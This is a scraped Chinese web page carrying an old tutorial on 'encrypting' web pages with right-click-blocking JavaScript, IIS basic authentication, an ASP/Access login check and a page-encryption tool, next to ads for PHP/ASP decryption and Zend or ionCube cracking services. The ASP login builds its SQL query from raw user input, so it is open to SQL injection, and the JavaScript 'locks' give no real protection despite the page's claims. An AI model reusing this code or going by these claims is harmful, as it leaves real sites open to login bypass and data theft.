bbbbbfdsgdsfgsdfgasdffffffff='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&}&catch(xxfqeadsf)&{&xxfqeadsf=1;&}&&/script&&
【上一篇】
【下一篇】
看完这篇文章有何感觉?
(您的评论需要经过审核才能显示,请文明发言!)&&剩余字数:
点击图片更换
统一文章资讯频道声明
1、 所有来源标注为统一下载站或统一文章的内容版权均为本站所有,若您需要引用、转载,请注明来源及原文链接即可,如涉及大面积转载,请来信告知,获取授权。
2、 本站所提供的文章资讯等内容均为作者提供、网友推荐、互联网整理而来,仅供学习参考,如有侵犯您的版权,请及时联系我们,并提供原文出处等,本站将在三个工作日内修正。
3、 若您的网站或机构从本站获取的一切资源进行商业使用,除来源为本站的资料需与本站协商外,其他资源请自行联系版权所有人。
4、 未经统一下载站允许,不得盗链、盗用本站资源;不得复制或仿造本网站,不得在非统一下载站所属的服务器上建立镜像,站长之家对其自行开发的或和他人共同开发的所有内容、技术手段和服务拥有全部知识产权,任何人不得侵害或破坏,也不得擅自使用。
文章教程分类
Copy . All Rights Reserved.
本站资源均收集整理于互联网,其著作权归原作者所有,如果有侵犯您权利的资源,请来信告知,我们将及时撤销相应资源。/ 简单的网站防复制代码和破解方式
顶级赞助商
放错地方的广告找源码|php解密加密|php混淆解密|phpjm解密|php在线解密|ASP在线解密|ASPEncodeDLL解密|ioncube9解密|php反编译|zend6解密|Zend Guard 6 破解|||
PHP混淆类加密解密VIP版,适用于免费版无法解密的.或者有时间\IP\域名限制的混淆程序.
PHP找源码针对PHP组件类加密如:ZEND等,程序运行需要在PHP.INI中加载DLL(SO)文件的加密解密.
在这里可以修复ZEND加密后的文件,最好的zend混淆修复工具.
如果您有PHP文件需要保密加密,看这里了很安全的加密解决方案.
在这里你可以解密ASP加密的文件,如:ASPEncodeDLL加密的ASP文件 .
在这里你可以解密修复ASP混淆加密的文件,如:chr或自己定义加密 .
牛X任性的工具网站<
关于【找源码】 的介绍
这个网站作什么?
找源码顾名思义就是可以帮您找回程序(Program)的源代码(Source Code),通过技术手段逆向、重写、还原将已经编译、加密的程序还原成易读、可二次开发的源代码。
他可以找回哪些代码?
本系统主要还是针对WEB开发语言,如:PHP、ASP、NET等,现阶段已支持PHP\ASP的代码找回、逆向、解密。
支持哪一些代码还原?
A、基于混淆类(无需第三方组件或修改PHP的)如:phpjm、phppd神盾、php微盾(威盾)、tianyiw、小猪、齐博等各类混淆加密等,可实现百分百还原。
B、Zend类加密(PHP 5.2\5.3\5.4\5.5\5.6)的加密还原可达95%以上,针对加密混淆系统开发修复工具,提高修复效率。
C、第三方加密,如:易盾(各版本)、iRadikal、ionCube(7,8,9)、SourceGuardian、zoeeyguard(php_puzzcore)、php-beast、php_screw、bcompiler、BZ2、Phpexpress、truebug等,也有较好的还原效果。
D、支持对PHP代码的美化操作。
E、支持VBS(JS)EnCode加密的文件在线还原,支持ASPEnCode即ASP代码加密工具的代码还原,支持ASPAPPG(ASP加密锁)V2.x,V3.x的代码还原。
F、最强大的PHP代码修复功能,支持混淆\乱码\字符集\长变量的修复。
G、最强大的ASP代码修复功能,支持混淆\乱码\字符集\ASP自定义函数加密修复。
H、强大的FLASH文件转换FLA服务,别人处理不了的来找我。
本系统刚刚测试中,欢迎您提出宝贵意见!
部份找源码对比截图:
友情连接:PR大于3,技术类网站欢迎交换,作好我连接后请联系QQ:7530782网页加密完全攻略
作者:佚名
字体:[ ] 来源:互联网 时间:10-08 19:03:56
现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一下如何给我们的网页加上一把密码锁。
一、常用JavaScript
现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一下如何给我们的网页加上一把密码锁。
一、常用JavaScript密码锁
1. 了解javascript
JavaScript是一种新的网页描述语言,是由Sun公司以及网景Netscape公司开发的,此一语言可以被嵌入HTML的文件之中,使用它可以让你设计交互性的网页内容。
2. javascript特点
使用javascript非常简单,只是一小段代码,就可以让网页发生千奇百怪的效果,而且使用javascript来加密的方法是网络中加密最常用的方法。
3. 使用javascript加密
使用javascript加密最简单的结果就是让浏览者不能使用鼠标右键,当他点击右键想对图片进行保存或者复制文字的时候就会弹出一个警告窗口或是弹出收藏夹等。
实现方法:
(1)利用弹出窗口封锁鼠标右键将下面这段代码放在网页HTML代码的<head></head>标志中,就可以实现封锁右键,给网页加密。
<script language=&javascript&>function click() {if (event.button==2) {alert('本站不准使用右键,使用左键吧!^_^') }}document.onmousedown=click</script>
(2)弹出“添加收藏夹”封锁鼠标右键将下面这段代码放在网页的HTML代码的<head></head>标志中。实现点击右键出现“添加到收藏夹”选项。
<script language=&javascript&>function click() {if (event.button==2) {window.external.addFavorite('/,' 51CTO')}}document.onmousedown=click</script>
(3)彻底封锁鼠标右键将下面这段代码放在网页的HTML代码的<head></head>标志中能够实现彻底封锁鼠标右键的效果,由于这个脚本在右键按下时调用一个函数,所以可以改为很多种类型。即使按下左键,再按下右键,放开左键,再放开右键的方法也还是破解不了。
<script>function DM(e){if(!ns){if(event.button>1)window.external.addFavorite('/,' 大众网络报')}else{if(e.which>1)return false}}ns=navigator.appName==&Netscape&;if(ns)document.captureEvents(Event.MOUSEMOVE|Event.MOUSEDOWN);document.onmousemove=DM;document.onmousedown=DM;</script>
(4)禁止查看源文件将下面这段代码放在网页的HTML代码的<head></head>标志中则可以实现禁止利用IE浏览器查看源文件。
<script language=&JavaScript&><!--document.onmousedown=clickfunction click() {if ( event.button==2) {alert('不准查看源文件') }if ( event.button==3) {alert('不准查看源文件') }}//--></script>
(5)用乱码显示链接、调用地址加密。利用某些函数把URL字符转换成ASCII码,从而达到隐藏链接Frame页面和*.js,*.asp等脚本的目的。返回ASCII码escape(character),ASCII码为%XX格式,XX是十六进制,如空格键为 。返回字符unEscape(string)
<!—var Words=&
<frame SRC="/XXX/XXX/" NAME="oos1" &//--></script>
利用javascript还可以使用调用脚本显示页面加密、密码校验等加密方法,但是由于代码繁杂而不经常使用,这里就不多讲了。
二、使用IIS的密码锁
不要以为只有javascript可以加密,使用IIS也可实现加密,只要你电脑上安装的Web服务器是IIS,而你又是管理员权限的用户时,就可以用一种简单的方法来实现密码验证。(注意:使用Win 2000 Server版并安装了IIS及域用户管理器)
1. 启动“Internet 服务管理器”
步骤一:单击“开始”>“设置”>“控制面板”,双击进入到“管理工具”中,打开“Internet 服务管理器”,展开左窗口的“默认Web站点”,然后在其所展开的目录中选中我们想对其进行加密的目录(如:lastcoco),然后单击“属性”按钮,打开“lastcoco属性”对话框(如图1)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
步骤二:选择“lastcoco属性”对话框中“目录安全性”标签,单击“匿名访问及验证控件”域中的“编辑”按钮。这时会弹出“验证方法”对话框,在“验证方法”对话框中,取消“允许匿名访问”选项前面的勾选,然后勾选“基本验证(密码用明文送出)”选项,最后单击“确定”按钮退出(如图2)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
2. 使用“域用户管理器”设置用户的名称及密码
光对目录的安全设置了还不行,为了让上网的朋友们只有在输入用户名称和密码后才可以浏览放在该目录下的网页,我们还要使用“域用户管理器”设置用户的名称及密码。
单击“开始”>“程序”>“系统管理工具”(公用)>“域用户管理器”,启动“域用户管理器”(如图3)。在这里我们给域用户里添加新用户,选择“用户”>“新用户”,然后在“新用户”窗口中输入新用户的“用户名及密码”等等,然后取消“用户下次登录时须改变密码”的选项。
500)this.width=500" title="点击这里用新窗口浏览图片" />
到此为止,利用IIS服务器来给网页加密就全部完成了,当用户想访问安全目录下的网页时。只要在出现的“输入网络密码”窗口中输入我们在“域用户管理器”中设置的新用名名及密码就可以进入安全设置目录(如图4)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
三、使用ASP程序密码锁
除了使用IIS服务器来给网页加密,我们还可以使用ASP程序来给网页进行加密,一般来说利用程序来进行密码验证的方法比较通用,现在大多数网站都使用ASP程序,它对Web服务器没有具体要求,而其加密就是借助数据库及ASP程序进行设计,来实现一种通用网页加密。
1. 打开Microsoft Access,建立一个“用户名及密码”的数据表,假设将这个表取名为User,数据库名为lastcoco.mdb,数据表的结构如下:
字段说明 字段名称 数据类型 数据长度
用户名称 ID文本 15
2. 编辑一个PASS.ASP的验证文件,源代码如下:
<%Function Check( ID, Pwd )Dim conn, par, rsSet conn = Server.CreateObject(&ADODB.Connection&)par = &driver={Microsoft Access Driver (*.mdb)} &conn.Open par && &;dbq=& && Server.MapPath(&lastcoco.mdb &)sql = &Select ? From users Where ID='& && ID && &' And Pwd = '& && Pwd &&&'&Set rs = conn.Execute( sql )If rs.EOF ThenCheck= FalseElseCheck= TrueEnd IfEnd Function%><%If IsEmpty(Session(&Passed&)) Then Session(&Passed&) = FalseHead = &请输入用户名和密码&ID = Request(&ID&)Pwd = Request(&Pwd&)If ID = && Or Pwd = && ThenHead = &请输入用户名和密码&Else If Not Check( ID, Pwd ) ThenHead = &用户名称或密码有错&ElseSession(&Passed&) = TrueEnd IfIf Not Session(&Passed&) Then %><html><head> <title></title> </head><body BGCOLOR=&#FFFFFF&><h2 ALIGN=&CENTER&><%=Head%></h2><hr WIDTH=&100%&><form Action=&<%=Request.ServerVariables(&PATH_INFO&)%>& Method=&POST&><table BORDER=&1& CELLSPACING=&0&><tr><td ALIGN=&RIGHT&>用户名称:</td><td><input Type=&Text& Name=&ID& Size=&12& Value=&<%=ID%>&></td></tr><tr> <td ALIGN=&RIGHT&>密码:</td><td><input Type=&Password& Name=&Pwd& Size=&12& Value=&<%=Pwd%>&></td> </tr></table><p><input Type=&Submit& Value=&确定&> </p> </form><hr WIDTH=&100%& align=¢er&></body> </html><%Response.EndEnd If %>
3. 在需要加密网页的HTML代码最前面加上〈! --#include file=&pass.asp&--〉就可以了。由于这个验证合法性的页面具有通用性,所以非常方便使用。
四、使用软件密码锁
现在给网页加密的软件非常多,这里就不一一讲解,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去按一下加密按钮就OK了。
在这里我们介绍一款绿色的小软件“世纪鸟网页加密精灵”,大家不要小看这只鸟,通过这只小鸟,能更方便快速的对网页进行加密。
下载双击打开这只小鸟,只见XP风格的界面跳到眼前,左边竖着一排是加密选项按钮,分别是“网页代码加密”、“网页登录密码”“鼠标右键屏蔽”、“网页选择屏蔽”、“鼠标右键对话”、“框架包含限制”这些。右边则是网页代码加密对话框,在这个对话框中进行对网页的加密,而且在对话框上方给出每个选项的解释,在对话框下方则是建议。
这里我用实例给大家讲解使用“世纪鸟网页加密精灵”的“网页登录密码”选项来给网页加密。
1. 打开要加密的网页,复制出HTML源代码,然后打开“世纪鸟网页加密精灵”软件,选择“网页登录密码”选项,这时在右边就会出现一些输入框内的代码说明(如图5)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
2. 在“请输入登录密码”的输入框中输入长度小于10位的密码,然后单击“生成并复制密码页面程序”按钮,这时软件会自动在下方的javascript代码中加入你输入的登录密码做为验证信息,并将这段代码复制到你的剪贴版中(如图6)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
3. 接下来再将这段代码粘贴到网页中,并将网页改名为(你输入的登录密码).htm,这样就可以对此文件加密了。
OK,现在你的网页就再也不用担心被人偷用了。
大家感兴趣的内容
12345678910
最近更新的内容}
我要回帖
更多关于 网页段落代码 的文章
更多推荐
- ·闲鱼到底可不可靠上的东西可信吗?
- ·卖家驳回退款,买家不处理怎么办拒绝退货退款,淘宝判定卖家驳回退款,买家不处理怎么办责任,但卖家驳回退款,买家不处理怎么办保证金不够,故而只能起诉,等待开庭期间可以使用该商品吗?
- ·一首中文歌,男的唱的,开头有一首歌里面有一句歌词是唱情歌段女声的独白,好像说有情人,终成眷属,说的断断续续的还有下雨的声音~
- ·怎样访问AFDaff网站进不去的原因?
- ·常柴170小型柴油机5型6马力正宗产品拼多多价格是多少?
- ·n900v电信4g可以设置4g网络吗
- ·怎么编辑无主之地2刺客视频视频网址
- ·八进制转十六进制315D=()H
- ·lipad5卡能不能装电信卡lipad5卡能不能装电信卡
- ·七个刚满月的宝宝不睡觉夜里不睡觉?
- ·临资口天葬礼视频频在哪个网站观看?
- ·您好,您是在后石电厂工作么?我想咨询下今年后石电厂热能动力装置方向的招聘时间以及招聘的网站?你能告知下么
- ·谁有<linux c函数实例eclipse 快速查找函数手册> 张丽萍的那一本?
- ·老公下班就开电脑打游戏,吃饭很快,然后继续打游戏打屁屁的视频直到打烂睡觉,我们很少说话,一直以来都是这样,我现在怀
- ·电脑显示 Plug ang Play 服务系统处理程序意外终止止 Windows 必须立即重新启动 是
- ·附加提怎么做啊,百度和二年级下册数学附加题的朋友们
- ·iphone5s home键坏了的home键可以转动的吗?
- ·我安好了win7出现了win7激活工具,win7声卡一键修复,win7激活工具,傲游浏览器2然后该怎
- ·如何解密这段网页加密解密代码?
- ·有人知道这是苹果哪个天气预报app哪个好app吗
- ·红米不小心把时间删了怎么办
- ·昌硕iphone未读邮件找不到收发室找不到
- ·要种 子 第七子百度云种子云
- ·审本时成了苹果丢失黑名单解锁怎样解锁
- ·www、ccgtc、comg1100980一69276玉法国v6送手镯是真的吗吗?值多少钱
- ·怎么知道微信解绑手机号绑了哪个扣扣号
- ·我是管理员可是删除群相册里的照片时提示没有ios 访问相册权限权限
- ·红楼之步步为赢赢汇软件可以在苹果电脑上使用吗
- ·昂达v698如何安卓删除桌面空白页空白桌面如何?
- ·可不可以4s换成5s的4s用哪个系统版本最好
- ·为什么我的手机流量会几分钟爱无处不在作文800字了800兆
- ·ramnit.c病毒,求解决
- ·学过安卓app开发学习开发的请进
- ·《悬赏》求一套详细的CAD施工施工图节点大样下载图!!!!!!
